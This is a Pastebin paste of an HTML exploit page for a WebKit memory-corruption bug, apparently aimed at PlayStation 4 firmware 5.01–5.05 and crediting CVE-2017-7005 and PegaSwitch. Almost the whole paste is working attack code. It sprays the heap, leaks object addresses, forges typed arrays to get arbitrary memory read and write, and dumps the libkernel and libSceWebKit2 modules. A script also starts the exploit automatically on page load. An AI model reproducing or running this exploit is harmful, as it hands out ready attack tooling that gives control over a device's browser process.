Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <body>
- <head>
- <script src="./data/utils/jquery.min.js"></script>
- <script src="./data/utils/utils.js"></script>
- <script src="./data/utils/utils.log.js"></script>
- <script src="./data/sploitcore.js"></script>
- <script src="./data/rop.js"></script>
- <script src="./data/syscalls.js"></script>
- <script src="./data/gadgets.js"></script>
- </head>
- <body background="http://backgroundcheckall.com/wp-content/uploads/2017/12/background-image-for-website-2.jpg">
- Beta
- <body>
- <center>
- RE CODE By <a href="https://twitter.com/xiranozer">XiRaLxRd</a><br>
- Original by ALEXZZZ9<br>
- Based on:<br>
- <a href="https://bugs.chromium.org/p/project-zero/issues/detail?id=1208">CVE-2017-7005</a><br>
- <a href="https://github.com/reswitched/pegaswitch">PegaSwitch</a> <a href="https://github.com/reswitched/pegaswitch/blob/master/LICENSE.md">(Copyright 2017 ReSwitched Team)</a><br>
- 4.0x exploit by <a href="https://twitter.com/qwertyoruiopz">qwertyoruiopz</a><br>
- <br>
- This exploit supports 5.01>5.05 (support Beta 5.50)
- Version : 1.5 <br>
- </center>
- <center id="buttons" style="visibility:hidden;">
- <input id="go" type="button" onclick="restart()" value="Restart"><br>
- <br>
- <input id="go" type="button" onclick="dump('libkernel')" value="Dump libkernel"><br>
- <input id="go" type="button" onclick="dump('libSceWebKit2')" value="Dump libSceWebKit2"><br>
- </center>
- <div class="footer">
- <h5>===== COMPLETE EXPLOIT LOGS =====</h5>
- <pre id="log"></pre>
- </div>
- <script>
- var mainDebugLog = true;
- var done = true;
- var tryCount = 0;
- var tryCountMax = 2;
- function start() {
- _dview = undefined;
- if (mainDebugLog) log('>> Exploit Starting .');
- buildObject(0, 0, function(b) {
- buildObject(0x1337, 0x1, function(d) {
- var sid = 1;
- var magic = {
- 'a': u2d(sid, 0x1602300 - 0x10000),
- 'b': b,
- 'c': u2d(1, 2),
- 'd': d
- };
- d = 0;
- b = 0;
- var bstore = new ArrayBuffer(0x10 * 4);
- var rwmagic = new Uint32Array(bstore);
- var leakee = {
- 'b': null
- };
- var leaker = {
- 'a': leakee
- };
- leakAddrs(magic, rwmagic, leaker, function(err, magicaddr, rwaddr, leakeraddr) {
- if (err) {
- debug_log(`>> Error leaking : ${err}`);
- tryCount += 1;
- if (!done && tryCount < tryCountMax) {
- debug_log(`>> Retry #${tryCount}`);
- restart();
- } else {
- debug_log(`>> Please wait for Auto Reload !`);
- resetCount();
- setTimeout(function(){
- window.location.reload(1);
- }, 5000);
- }
- return;
- }
- resetCount();
- buildObject(rwaddr[0], rwaddr[1], function(c) {
- magic.c = c;
- c = 0;
- buildObject(magicaddr[0] + 4 * 4, magicaddr[1], function(o) {
- while (sid < 0x10000 && !(o instanceof Uint32Array)) {
- magic.a = u2d(++sid, 0x1602300 - 0x10000);
- }
- if (!(o instanceof Uint32Array)) {
- debug_log('>> Could not find structure ID!');
- return;
- }
- var save = [o[4], o[5], o[6]];
- o[4] = leakeraddr[0];
- o[5] = leakeraddr[1];
- o[6] = 0x1337;
- var va = new Uint32Array(bstore);
- var vb = new Uint32Array(bstore);
- leaker['a'] = leakee;
- leakee['b'] = {
- 'a': va
- };
- var leakaddr = [rwmagic[4], rwmagic[5]];
- o[4] = leakaddr[0];
- o[5] = leakaddr[1];
- var ta = [rwmagic[4], rwmagic[5]];
- o[4] = ta[0];
- o[5] = ta[1];
- var addra = [rwmagic[4], rwmagic[5]];
- o[4] = leakaddr[0];
- o[5] = leakaddr[1];
- leakee['b'] = {
- 'a': vb
- };
- ta = [rwmagic[4], rwmagic[5]];
- o[4] = ta[0];
- o[5] = ta[1];
- var addrb = [rwmagic[4], rwmagic[5]];
- o[4] = addra[0];
- o[5] = addra[1];
- rwmagic[4] = addrb[0];
- rwmagic[5] = addrb[1];
- o[4] = save[0];
- o[5] = save[1];
- o[6] = save[2];
- rwmagic = 0;
- // magic.a = 0;
- magic.b = 0;
- magic.c = 0;
- magic.d = 0;
- o = 0;
- // save = 0;
- debug_log('~~~~~~~~~~ WebKit Exploit Succeeded ~~~~~~~~~~');
- debug_log('~~~~~~~~~~ You Can Now Dump LibKernel and LibSceWebkit2 ! ~~~~~~~~~~');
- loadCore({
- bstore: bstore,
- va: va,
- vb: vb,
- leakee: leakee,
- leakaddr: leakaddr
- });
- });
- });
- });
- });
- });
- };
- function restart() {
- clearLog();
- setTimeout(function() {
- start();
- }, 100);
- }
- function resetCount() {
- tryCount = 0;
- done = false;
- }
- function buildObject(lo, hi, cb) {
- if (mainDebugLog) log('Building stuff.');
- var a = [0, 4.243991582e-314, u2d(lo, hi), 3.5e-323, 3.5e-323];
- var f = document.body.appendChild(document.createElement('iframe'));
- f.contentWindow.Array.prototype.__defineGetter__(100, function() {
- return 1
- });
- var sub = f.contentWindow.Array.prototype.slice.call(a, 0, 4);
- f.remove();
- cb(sub[0]);
- }
- function leakAddrs(obja, objb, objc, cb) {
- if (mainDebugLog) log('Attempting leak...');
- var numbufs = 100 * 8;
- var numchunks = 5000;
- var chunks = new Array(numchunks);
- var validator = ~~(Math.random() * 0x10000);
- var vj = u2d(validator, 0);
- if (mainDebugLog) log(`validator=0x${validator.toString(16)}`);
- function checkState(state) {
- if (mainDebugLog) log('Checking...');
- var elementCount = state.width * state.height / 4;
- var rb = new Uint32Array(state.data.buffer);
- var f = false;
- for (var i = 0; i < elementCount; ++i) {
- if (rb[i] === validator && rb[i + 1] === 0x10000 &&
- rb[i + 2] !== 0 && rb[i + 4] !== 0 && rb[i + 6] !== 0 &&
- rb[i + 2] !== rb[i + 4] && rb[i + 3] < 0x100 && rb[i + 5] < 0x100
- ) {
- if (mainDebugLog) debug_log('Found data. ' + i);
- done = true;
- if (mainDebugLog) {
- var tmpArr = [];
- for (var j = 0; j < 12; ++j) {
- tmpArr.push(`0x${rb[i + j].toString(16)}`);
- }
- debug_log(`data=${JSON.stringify(tmpArr)}`);
- }
- return cb(null, [rb[i + 2], rb[i + 3]], [rb[i + 4], rb[i + 5]], [rb[i + 6], rb[i + 7]]);
- }
- }
- return cb('Not Found', null, null, null);
- }
- var id = new ImageData(1, 1 * 1024 * 1024 / 4);
- if (mainDebugLog) log('Allocating...');
- for (var j = 0; j < numchunks; ++j) {
- var bufs = chunks[j] = new Array(numbufs);
- for (var i = 0; i < numbufs; i += 4) {
- bufs[i] = vj;
- bufs[i + 1] = obja;
- bufs[i + 2] = objb;
- bufs[i + 3] = objc;
- }
- bufs = 0;
- }
- for (var j = 0; j < numchunks; ++j) {
- delete chunks[j];
- }
- postMessage('', '*', [id.data.buffer]);
- history.pushState(id, '');
- setTimeout(function() {
- checkState(history.state);
- }, 0);
- }
- function loadCore(obj) {
- debug_log('~~~~~~~~~~Loadig Exploit Core~~~~~~~~~~');
- var ECore = new SploitCore(obj);
- window.ECore = ECore;
- document.getElementById("buttons").removeAttribute("style");
- }
- function dump(module) {
- var size1KB = (0x10 * 64) * 1;
- var size16KB = (0x10 * 64) * 16;
- var size32KB = (0x10 * 64) * 32;
- var size64KB = (0x10 * 64) * 64;
- var size128KB = (0x10 * 64) * 128;
- var size512KB = (0x10 * 64) * 128 * 4;
- var size1MB = (0x10 * 64) * 128 * 8;
- if (module === 'libkernel') {
- ECore.memDump(window.ECore.moduleBaseAddresses['libkernel'], 0x7FFFF, `libkernel.sprx`, false);
- } else if (module === 'libSceWebKit2') {
- var dumpAddress = ECore.base;
- var dumpSize = size1MB * 3;
- var dumpOffset = 0;
- var stopDump = false;
- var dumpNumber = 0;
- while (!stopDump) {
- dumpNumber++;
- if (dumpNumber === 19) {
- dumpSize = size128KB;
- }
- if (dumpNumber === 60) stopDump = true;
- if (dumpNumber > 1) dumpOffset += dumpSize;
- debug_log(`Dump #${dumpNumber} (Address:${paddr(add2(dumpAddress, dumpOffset))} | Offset:${dumpOffset} | Size: ${dumpSize})`);
- ECore.memDump(add2(dumpAddress, dumpOffset), dumpSize, `libSceWebKit2.sprx`, true);
- }
- }
- }
- </script>
- <script>
- setTimeout(function() {
- document.getElementById('go').click();
- }, 100);
- </script>
- </body>
- </body>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement